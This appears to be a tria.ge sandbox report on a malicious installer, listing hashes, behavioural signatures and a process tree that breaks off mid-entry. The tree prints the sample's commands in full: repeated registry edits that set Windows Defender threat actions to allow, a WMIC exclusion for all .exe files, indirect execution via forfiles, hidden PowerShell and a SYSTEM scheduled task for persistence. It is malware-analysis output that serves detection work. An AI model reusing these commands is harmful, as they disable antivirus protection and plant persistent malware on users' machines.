Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/09/2024, 04:09

General

  • Target

    3c9b40c1ee18d13dda9c2fee53ff24f1877c413505b1764769dd4524b9e825e7.exe

  • Size

    7.3MB

  • MD5

    9ca8e1bb266f57df5c0ad97a693fc7f4

  • SHA1

    e3f0768fa6f2684a6a1c98d6b44571bf28bb63ee

  • SHA256

    3c9b40c1ee18d13dda9c2fee53ff24f1877c413505b1764769dd4524b9e825e7

  • SHA512

    20eb49473905db02faa86e24b75083fdd35beeead47185b4a6f2d6df656abdfb3dd7a7564bcbafc5f8b7b57e6c75cd63f5d3b657aad090cdc7ec4cae14b42488

  • SSDEEP

    196608:91OR9yfMNJbL67/vgZc8I03t+Vuq7X0CaPok+M8m8mzDOCp2/sIZy:3Oek7q7/vURlgwq7aPinCg/sIZy

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3c9b40c1ee18d13dda9c2fee53ff24f1877c413505b1764769dd4524b9e825e7.exe
    "C:\Users\Admin\AppData\Local\Temp\3c9b40c1ee18d13dda9c2fee53ff24f1877c413505b1764769dd4524b9e825e7.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1716
    • C:\Users\Admin\AppData\Local\Temp\7zSE53.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4532
      • C:\Users\Admin\AppData\Local\Temp\7zS1085.tmp\Install.exe
        .\Install.exe /GKFmkdidzGtRN "385121" /S
        3⤵
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:3712
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4384
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1004
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2008
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:4592
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4580
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1848
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                  PID:3476
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3056
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3132
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  7⤵
                    PID:4552
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                5⤵
                • Indirect Command Execution
                • Suspicious use of WriteProcessMemory
                PID:3548
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1048
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                      PID:544
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  5⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2196
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3624
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      7⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:388
                      • C:\Windows\SysWOW64\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        8⤵
                          PID:4332
                • C:\Windows\SysWOW64\forfiles.exe
                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                  4⤵
                  • Indirect Command Execution
                  • Suspicious use of WriteProcessMemory
                  PID:2424
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:212
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1672
                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        7⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:528
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "bSxzCgPeqgMvWlpxXo" /SC once /ST 04:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS1085.tmp\Install.exe\" gk /Rvdidqz 385121 /S" /V1 /F
                  4⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1668
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3712 -s 980
                  4⤵
                  • Program crash
                  PID:1196
          • C:\Users\Admin\AppData\Local\Temp\7zS1085.tmp\Install.exe
            C:\Users\Admin\AppData\Local\Temp\7zS1085.tmp\Install.exe gk /Rvdidqz 385121 /S
            1⤵
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            PID:1304
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
              2⤵
                PID:4592
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  3⤵
                  • Indirect Command Execution
                  PID:1884
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                    4⤵
                      PID:2992
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:636
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:3136
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                      4⤵
                        PID:3716
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:3396
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                      3⤵
                      • Indirect Command Execution
                      PID:3464
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        4⤵
                          PID:4236
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:4576
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                        3⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:5104
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:532
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:5084
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                        3⤵
                        • Indirect Command Execution
                        PID:1924
                        • C:\Windows\SysWOW64\cmd.exe
                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                          4⤵
                            PID:4892
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2660
                              • C:\Windows\SysWOW64\gpupdate.exe
                                "C:\Windows\system32\gpupdate.exe" /force
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:452
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                        2⤵
                        • Drops file in System32 directory
                        • System Location Discovery: System Language Discovery
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1564
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:3328
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                              4⤵
                                PID:1136
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2064
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:3524
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1508
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                              3⤵
                                PID:4296
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1672
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                3⤵
                                  PID:212
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                  3⤵
                                    PID:808
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3208
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:2252
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                        PID:3076
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                          PID:2648
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:448
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3912
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:2676
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:2900
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3780
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:4832
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:1660
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:4268
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4504
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5088
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2292
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4984
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:2164
                                                    • C:\Windows\SysWOW64\reg.exe
